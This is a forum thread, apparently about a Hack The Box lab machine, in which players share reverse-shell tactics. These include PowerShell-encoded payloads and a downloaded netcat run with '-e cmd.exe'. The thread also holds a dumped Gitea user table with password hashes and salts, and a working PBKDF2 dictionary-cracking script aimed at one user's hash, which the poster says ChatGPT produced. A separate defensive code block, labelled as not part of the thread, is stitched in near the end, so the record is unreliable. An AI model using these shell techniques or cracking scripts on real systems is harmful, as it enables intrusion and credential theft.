Posts: 196
Threads: 31
Joined: Apr 2024
(Jul 28, 2024, 06:17 AM)UnkownWombat Wrote: (Jul 28, 2024, 04:19 AM)gihimlek Wrote: (Jul 28, 2024, 04:17 AM)osamy7593 Wrote: (Jul 28, 2024, 04:15 AM)gihimlek Wrote: (Jul 28, 2024, 03:35 AM)fuckhackthebox Wrote: yeah
Nice!
how u got it work bro can u explain
Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want
did you get it back on a certain port or smthg, confused as to what im doing wrong here, did manually and by script
(Jul 28, 2024, 05:50 AM)maggi Wrote: I found a file called "pwnd"; its called pwnd so it has to do something somewhere maybe?
Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd
ruycr4ft_was_here
i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,
could you give me a nudge on shell please
This is where I shot myself in the foot, I used a bash shell and then a powershell shell underneath as a payload, so idk if I am stuck in a mingw64 shell because I was stupid.....
or that's just the way things is?
Try spamming the compile deally with the 2nd repo, it took a bit
Posts: 124
Threads: 1
Joined: Apr 2024
Jul 28, 2024, 07:37 AM
(This post was last modified: Jul 28, 2024, 07:48 AM by jsvensson.)
What payload gives you a shell? I got connection when i try curl in payload but none shell.
Nevermind i got it
Posts: 12
Threads: 0
Joined: Jun 2024
(Jul 28, 2024, 07:37 AM)jsvensson Wrote: What payload gives you a shell? I got connection when i try curl in payload but none shell.
i did powershell -e payload and it worked well, you just have to spam the compiler with the 2nd repo as someone mentioned
Posts: 67
Threads: 3
Joined: Jul 2024
(Jul 28, 2024, 06:39 AM)maggi Wrote: (Jul 28, 2024, 06:17 AM)UnkownWombat Wrote: (Jul 28, 2024, 04:19 AM)gihimlek Wrote: (Jul 28, 2024, 04:17 AM)osamy7593 Wrote: (Jul 28, 2024, 04:15 AM)gihimlek Wrote: Nice!
how u got it work bro can u explain
Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want
did you get it back on a certain port or smthg, confused as to what im doing wrong here, did manually and by script
(Jul 28, 2024, 05:50 AM)maggi Wrote: I found a file called "pwnd"; its called pwnd so it has to do something somewhere maybe?
Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd
ruycr4ft_was_here
i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,
could you give me a nudge on shell please
This is where I shot myself in the foot, I used a bash shell and then a powershell shell underneath as a payload, so idk if I am stuck in a mingw64 shell because I was stupid.....
or that's just the way things is?
Try spamming the compile deally with the 2nd repo, it took a bit
(Jul 28, 2024, 07:48 AM)anon912039120 Wrote: (Jul 28, 2024, 07:37 AM)jsvensson Wrote: What payload gives you a shell? I got connection when i try curl in payload but none shell.
i did powershell -e payload and it worked well, you just have to spam the compiler with the 2nd repo as someone mentioned
spamming the :5000 site is definitely the way
also to upgrade shell i curled over a nc binary and did a -e cmd.exe
Posts: 37
Threads: 1
Joined: Mar 2024
(Jul 28, 2024, 04:19 AM)gihimlek Wrote: (Jul 28, 2024, 04:17 AM)osamy7593 Wrote: (Jul 28, 2024, 04:15 AM)gihimlek Wrote: (Jul 28, 2024, 03:35 AM)fuckhackthebox Wrote: (Jul 28, 2024, 03:31 AM)gihimlek Wrote: Payload could be a simple "powershell -e base64revshell" ?
yeah
Nice!
how u got it work bro can u explain
Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want
Did the exact same thing, trying to ping or curl first, but it just didnt want to work…
Posts: 59
Threads: 1
Joined: Jun 2024
(Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
Help me crack this guys. Been struggling on this for a while 
What is the path to this db file?
Posts: 124
Threads: 1
Joined: Apr 2024
Damn, password for Emily is a joke
You can decrypt it from gitea.db using a python script, mine ChatGPT got for me.
Posts: 60
Threads: 9
Joined: Jun 2024
yo, anyone got emily?
Posts: 124
Threads: 1
Joined: Apr 2024
Sure:
import hashlib
import binascii

def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',                  # hashing algorithm
        password.encode('utf-8'),  # password
        salt,                      # salt
        iterations,                # number of iterations
        dklen=dklen                # key length
    )
    return hash_value

def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
    target_hash_bytes = binascii.unhexlify(target_hash)
    # errors='ignore': the wordlist contains bytes that are not valid UTF-8
    with open(dictionary_file, 'r', encoding='utf-8', errors='ignore') as file:
        for line in file:
            password = line.strip()
            # generating hash
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
            # Check if hash is correct
            if hash_value == target_hash_bytes:
                print(f"Found password: {password}")
                return password
    print("Password not found.")
    return None

# Parameters
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')  # Salt from gitea.db
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'  # hash from gitea.db
# Path to dictionary
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)
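Added example, not part of any post in this thread: the defender's side of the `pbkdf2$50000$50` setting shown in the dump, parsing the algo string, verifying a login in constant time, and flagging rows whose iteration count is below policy so they get rehashed at next login. It assumes PBKDF2-HMAC-SHA256 with a hex-encoded salt, as the script above does; the function names, the 600,000 floor (OWASP's PBKDF2-HMAC-SHA256 guidance) and the sample rows are constructed for illustration.

```python
import hashlib
import hmac
from typing import NamedTuple

# Assumed policy floor: OWASP guidance for PBKDF2-HMAC-SHA256 is 600,000 iterations.
MIN_ITERATIONS = 600_000

class Pbkdf2Params(NamedTuple):
    iterations: int
    dklen: int

def parse_algo(spec: str) -> Pbkdf2Params:
    """Parse 'pbkdf2$<iterations>$<key length>' as it appears in the dump."""
    parts = spec.split("$")
    if len(parts) != 3 or parts[0] != "pbkdf2":
        raise ValueError(f"unsupported algo spec: {spec!r}")
    iterations, dklen = int(parts[1]), int(parts[2])
    if iterations <= 0 or dklen <= 0:
        raise ValueError(f"non-positive parameter in {spec!r}")
    return Pbkdf2Params(iterations, dklen)

def derive(password: str, salt_hex: str, spec: str) -> str:
    """PBKDF2-HMAC-SHA256 over a hex-encoded salt, returned as hex."""
    p = parse_algo(spec)
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                               bytes.fromhex(salt_hex), p.iterations, dklen=p.dklen).hex()

def verify(password: str, stored_hex: str, salt_hex: str, spec: str) -> bool:
    """Login-time check using a constant-time comparison."""
    return hmac.compare_digest(derive(password, salt_hex, spec), stored_hex.lower())

def needs_rehash(spec: str, floor: int = MIN_ITERATIONS) -> bool:
    """True when the stored parameters are below policy or cannot be parsed."""
    try:
        return parse_algo(spec).iterations < floor
    except ValueError:
        return True

def audit(rows, floor: int = MIN_ITERATIONS) -> list:
    """Return the names whose hash should be upgraded at next login."""
    return [name for name, spec in rows if needs_rehash(spec, floor)]

# Constructed sample rows (name, algo spec); not taken from the thread.
SAMPLE_ROWS = [("alice", "pbkdf2$50000$50"), ("bob", "pbkdf2$600000$50"), ("carol", "md5")]

if __name__ == "__main__":
    salt = "00112233445566778899aabbccddeeff"  # constructed salt
    stored = derive("correct horse battery", salt, "pbkdf2$50000$50")
    print(verify("correct horse battery", stored, salt, "pbkdf2$50000$50"))
    print(audit(SAMPLE_ROWS))
```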
Posts: 124
Threads: 1
Joined: Apr 2024
So now for root. Any hints?